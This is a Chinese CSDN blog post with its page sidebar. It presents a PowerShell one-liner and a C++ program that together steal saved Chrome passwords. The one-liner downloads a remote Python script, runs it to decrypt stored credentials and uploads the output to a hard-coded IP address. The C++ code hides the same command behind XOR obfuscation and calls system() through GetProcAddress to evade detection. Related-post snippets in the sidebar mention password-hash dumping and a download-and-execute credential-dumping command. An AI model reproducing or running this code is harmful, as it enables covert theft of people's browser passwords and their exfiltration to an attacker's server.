【Windows C++】powershell 获取chrome密码并上传

最新推荐文章于 2022-12-26 10:36:02 发布
最新推荐文章于 2022-12-26 10:36:02 发布
阅读量580 收藏 1
点赞数
分类专栏: C/C++ 文章标签: Windows C powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/81480128
版权

获取chrome密码是lijiejie的python脚本,因此powershell代码依赖于:python和pywin32(通过pip安装)

powershell代码:

#1 下载文件保存在用户temp目录下
Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt 
#2 pip安装pywin32用于解密
pip install pywin32
#3 执行python脚本
python $env:temp/update.txt
#4 回传数据
Invoke-RestMethod -Uri  http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt

最终: 
powershell "Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt ;pip install pywin32; python $env:temp/update.txt  ; Invoke-RestMethod -Uri  http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt"

C++实现:

#include "windows.h"
#include "string.h"
using namespace std;

int main()
{
		char cDllname[] = "\x7c\x62\x67\x72\x63\x65\x3f\x75\x7d\x7d";
		char cSystem[] = "\x62\x68\x62\x65\x74\x7c";//"system";
		char cPayload[] = "\x61\x7e\x66\x74\x63\x62\x79\x74\x7d\x7d\x31\x33\x58\x7f\x67\x7e\x7a\x74\x3c\x46\x74\x73\x43\x74\x60\x64\x74\x62\x65\x31\x3c\x44\x63\x78\x31\x79\x65\x65\x61\x2b\x3e\x3e\x6b\x79\x74\x7d\x78\x3f\x7e\x63\x76\x3e\x75\x70\x65\x70\x3e\x23\x21\x20\x29\x21\x29\x26\x28\x24\x26\x23\x22\x3f\x65\x69\x65\x31\x3c\x5e\x64\x65\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x2a\x61\x78\x61\x31\x78\x7f\x62\x65\x70\x7d\x7d\x31\x61\x68\x66\x78\x7f\x22\x23\x2a\x31\x61\x68\x65\x79\x7e\x7f\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x31\x2a\x31\x58\x7f\x67\x7e\x7a\x74\x3c\x43\x74\x62\x65\x5c\x74\x65\x79\x7e\x75\x31\x3c\x44\x63\x78\x31\x31\x79\x65\x65\x61\x2b\x3e\x3e\x25\x24\x3f\x22\x23\x3f\x27\x27\x3f\x20\x25\x22\x2b\x29\x21\x21\x20\x3e\x63\x74\x72\x67\x61\x7e\x62\x65\x3f\x61\x79\x61\x31\x3c\x5c\x74\x65\x79\x7e\x75\x31\x41\x7e\x62\x65\x31\x3c\x58\x7f\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x7d\x7e\x76\x33";

		static bool bIsUpdated = false;

		if(!bIsUpdated){
			for(int i=0; i<strlen(cPayload); i++){
				if(i<strlen(cSystem)){
					cSystem[i] ^= 0x11;
				}
				if(i<strlen(cDllname)){
					cDllname[i] ^= 0x11;
				}
				cPayload[i] ^= 0x11;
			}

			typedef void (WINAPI *PGNSI)(char *);
			PGNSI pGNSI;

			pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(TEXT(cDllname)),cSystem);
			pGNSI(cPayload);
			bIsUpdated = true;
		}

    return 0;
}

如果在vs2017中遇到类型转换的问题,可以尝试替换其中这段代码,讲char* 转换成 LPCWSTR。

    typedef void (WINAPI *PGNSI)(char *);
    PGNSI pGNSI;
    WCHAR wszClassName[256];
    MultiByteToWideChar(CP_ACP,0,cDllname,strlen(cDllname)+1,wszClassName,
          sizeof(wszClassName)/sizeof(wszClassName[0]));
    pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(wszClassName),cSystem);
    pGNSI(cPayload);
    bIsUpdated = true;

 

think_ycx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++解密Chrome80版本数据库的方法示例代码
12-20
谷歌浏览器Google Chrome 80正式版例行更新详细版本80.0.3987.163。Google Chrome浏览器又称谷歌浏览器采用Chromium内核全球最受欢迎的免费网页浏览器追求速度、隐私安全的网络浏览器。 先说下吧。chrome80以前的版本是直接可以通过DPAPI来进行解密的。关于DPAPI 大家可以 看这里的介绍 DPAPI是Windows系统级对数据进行加解密的一种接口无需自实现加解密代码微软已经提供了经过验证的高质量加解密算法提供了用户态的接口对密钥的推导存储数据加解密实现透明并提供较高的安全保证 DPAPI提供了两个用户态接口`CryptProtectData`加
PowerShell小技巧之获取Windows系统密码Hash
01-09
当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获。用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马,哪怕是替换次要的系统服务自己启动的木马,隐蔽性都太差了。不管后门留的如何完美,木马免杀做的多好,最
QPowerShell:通过 Qt C++Windows PowerShell 交互的简单模块
06-22
QPowerShell QPowerShell 为 Qt C++ 开发人员提供了一种与 Windows PowerShell CLI 交互的简单方法。 它仅在 PS 2.0 上进行过测试,但也应在较新的版本上进行测试。 这是我向公众发布的第一个项目。 请随时提交错误、建议或功能请求。 安装 只需克隆这个 repo 并将 src 文件夹中的所有文件包含到您的项目中。 有用的位 QPowerShell 实例创建 PowerShell.exe 进程并挂钩它们的 STDIN 和 STDOUT 流。 PS 接口称为 QPowerShellPipeline。 创建管道时,它们存储在 QPowerShell 实例持有的池中。 您可以通过调用 QPowerShell::nextAvailablePipe 向 QPowerShell 实例询问可用管道,该管道返回指向可用(当前未执行 PS 命令/读取
PowerShell获取Windows用户列表、用户信息的方法
01-20
WMI是Windows管理规范的缩写,其中包含很多系统的软硬件信息。而Windows用户信息也可以通过WMI对象来获取PowerShell提供了对WMI的访问功能,十分方便且强大——这就是Get-WmiObject这个cmdlet。 获取所有的Windows用户列表: Get-WmiObject -Class Win32_UserAccount 或者 Get-WmiObject 代码如下:Win32_UserAccount 如果是想知道查看当前登录的用户的信息,可以用如下语句: 代码如下:Get-WmiObject -Class Win32_UserAccount -Filter “Na
Windowspowershell获取指定文件夹和文件大小
01-07
将以下脚本命名为test.ps1, 并在powershell下运行.\test.ps1即可。 #list all folder and file size of specific filepath folder function filesize ([string]$filepath) { if ($filepath -eq $null) { throw file path cannot be blank } $_.name + file size(MB) -f $l | Out-File ($filepath+test.txt)
获取windows密码c++代码
01-20
获取windows密码c++代码,用了许多不常用api
使用powershell清理Google浏览器缓存、密码凭证、cookies等
purvispanwu的博客
04-04 1740
脚本如下: #-------------------获取登录的用户名-------------------- $user_name=$env:USERNAME #-------------------google-------------------- $googleprocess=Get-Process | Where-Object name -like chrome $googlepath="C:\Users\$user_name\AppData\Local\Google\Chrome\User Da
c++调用powershell_微软发布PowerShell 7.0,开发人员:自7以后才是真·PowerShell
weixin_39859061的博客
11-20 239
鱼羊 发自 凹非寺量子位 报道 | 公众号 QbitAI那个模糊了脚本和正经程序的边界,让一切皆有可能的PowerShell,7.0正式版发布啦。新的语法糖,更好的兼容性,最重要的,是从.NET Core 2.x完全迁移到了3.1。背后生态的升级,也意味着PowerShell 7比起它的老版本们,更具向后兼容性。PowerShell的开发人员甚至表示:PowerShell 7标志着Windows ...
Windows C++】调用powershell上传指定目录下所有文件
think_ycx的专栏
07-23 2566
上周写的一个恶意代码片段,功能为: C++实现读取"C:\Users\thinkycx\.ssh\"目录下所有文件(不包括子文件夹),使用getProcessAddress获取system函数地址,动态调用system执行命令:powershell上传文件。 测试powershell功能用的上传命令,注意powershell代码中的\"代表转义的"。 powershell "Invoke-R...
paip. c++ 调用.net dll 最好方式powershell 使用总结.
attilax的专栏
09-23 3912
paip. c++ 调用.net dll 最好方式powershell 使用总结. 作者Attilax ,  EMAIL:[email protected]  来源:attilax的专栏 地址:http://blog.csdn.net/attilax  c++ 调用.net dll ...有几个方法:  1.使用CLR HOST..不过麻烦, 以及只能调用static 方
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
PHP的各种安全问题总结 一文了解PHP的各类漏洞和绕过姿势
闵行小鱼塘
11-26 3452
尽可能全面的总结PHP的各种安全问题:基础知识、弱类型及各种函数、伪协议、反序列化、其他,本篇持续更新
聪明的程序员用Delphi,真正的程序员用C++,偷懒的程序员用PowerShell
weixin_33851604的博客
11-06 307
简介 感谢大家的支持,以及微软社区精英计划团队的肯定,我被邀请在微软MSDN网络建立个人主页,由于第一次建立主页的时候,需要提交相关博文的信息,为了实现该需求,我用PowerShell来完成博文的采集。本文讲述如何使用PowerShell来采集博客园上的博文信息。 需求 需要把提交的博文整理成一个表格,显示发布时间,内容标题,具体链结位置,技术分类和...
使用 PowerShell 命令安装 Google Chrome 浏览器
tiger57的博客
10-17 803
使用 PowerShell 命令安装 Google Chrome 浏览器。
利用powershell安装常用浏览器
weixin_44337289的博客
12-26 762
接下来是2345公司的浏览器,纯净版,目前搜索引擎只支持百度,不像网上常见的版本一样会自动下载文件,因为那是魔改版本。然后是谷歌Chrome浏览器,这款浏览器是很多程序开发的基础,所以很多网站上都推荐使用chrome浏览器,但是不幸的是,很多网上的软件都叫谷歌浏览器,简单来说就是魔改版本。首先是火狐浏览器,火狐浏览器的主要特点是搜索引擎多和插件丰富,不失为一个入门浏览器的好选择,当然它的主页广告越来越花哨,建议换掉,另外它可以使用微软的bing搜索引擎,相信我,换一个搜索引擎,你检索到的将是另一个世界。
优化C++制作的简易密码管理工具
yangjiegang8的博客
02-02 351
最近空闲时间较多,特地复习下C++的基础知识。 原文地址适合练手的密码本项目 修改(优化)点: 修复从文件中读取数据、把数据重新写入文件等BUG使软件能正常运行 删除持久化数据的多余空格 修改每次新增都持久化为先缓存再手动持久化 原作只管加密不管解密 下一步基于Qt图形化 操作截图如下: 代码如下: #define _CRT_SECURE_NO_WARNINGS #i...
c++ 调用 powershell_十九,Powershell基础入门及常见用法(一)
weixin_42395980的博客
12-27 5487
一.Powershell初识1.基础概念Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。传统的CMD支持脚本编写,但扩展性不好,而Powershell类...
vs2019使用system调用powershell报错
背着行囊去远方的博客
07-13 2910
前提条件: 写了一段程序需要调用到一个powershell脚本 命令大概这样:system("powershell -file test.ps1") ,然后一直报错。 把同样的命令放到cmd中执行就没有问题。 原因是:执行权限的问题,在system中加入了powershell set-executionpolicy remotesigned,这样就powershell的问题,然后又发...
python用powershell获取mac并打印
最新发布
06-11
要使用 PowerShell 获取 MAC 地址,并将其打印到 Python 控制台上,你可以使用 `subprocess` 模块来执行 PowerShell 命令。 以下是示例代码: ```python import subprocess # 使用 PowerShell 命令获取 MAC 地址 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值